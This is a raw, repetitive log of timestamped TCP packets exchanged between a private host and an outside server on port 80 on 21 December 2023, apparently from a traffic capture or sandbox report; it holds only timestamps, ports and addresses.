                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660711050 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660756111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660774946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660816908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660820961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660868883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660901070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660953045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.660967112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661014080 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661026955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661102057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661147118 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661216021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661304951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661348104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661374092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661432028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661469936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661528111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661623955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661636114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661667109 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661715031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661755085 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661782980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661868095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661887884 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661909103 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.661963940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662005901 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662025928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662064075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662106037 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662149906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662178040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662221909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662262917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662288904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662334919 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662385941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662401915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662440062 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662445068 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662482023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662525892 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662534952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662621975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662663937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662694931 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662734985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662748098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662777901 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662801027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662842035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662848949 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662894964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662941933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.662967920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.663039923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.663053036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.663098097 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.663204908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.663244009 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.684295893 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.685139894 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.860800982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.860841036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.860888958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.860927105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861022949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861061096 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861102104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861159086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861196041 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861239910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861304045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861337900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861380100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861427069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861463070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861511946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861593008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861629963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861670017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861773968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861816883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861841917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861929893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861967087 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.861996889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862081051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862116098 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862147093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862225056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862261057 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862307072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862400055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862437963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862488031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862567902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862605095 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862845898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862926006 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862965107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.862998009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863146067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863183022 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863250971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863327980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863362074 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863415003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863498926 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863537073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863579988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863640070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863675117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863749027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863893032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863924026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.863931894 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864010096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864048958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864069939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864132881 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864168882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864214897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864260912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864298105 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864326000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864396095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864435911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864439011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864511967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864548922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864581108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864712000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864744902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864753008 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864890099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864928961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.864974976 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865050077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865087986 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865129948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865196943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865236044 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865292072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865343094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865381002 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865410089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865478039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865509987 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865544081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865632057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865668058 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865695953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865921021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865952015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865979910 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.865992069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866028070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866055965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866103888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866142988 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866461992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866511106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866547108 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866589069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866694927 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866735935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866784096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866899014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.866935968 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867017984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867038012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867074013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867121935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867286921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867321968 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867330074 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867399931 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867439032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867497921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867568016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867605925 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867646933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867706060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867743015 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867794037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867887020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.867925882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868073940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868252993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868289948 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868338108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868422985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868459940 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868508101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868603945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868643045 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868655920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868757963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868794918 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868834972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868920088 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.868957043 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869005919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869049072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869083881 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869138956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869208097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869246960 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869260073 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869373083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869400024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869426012 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869468927 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869508028 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869530916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869663000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869709015 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869739056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869801044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869837046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.869889021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870194912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870230913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870239973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870353937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870389938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870434046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870507002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870543003 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870623112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870718002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870753050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870755911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870824099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870862961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.870897055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871018887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871054888 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871108055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871180058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871218920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871259928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871344090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871380091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871433973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871550083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871588945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871592045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.871682882 CET804973891.215.85.17192.168.2.4
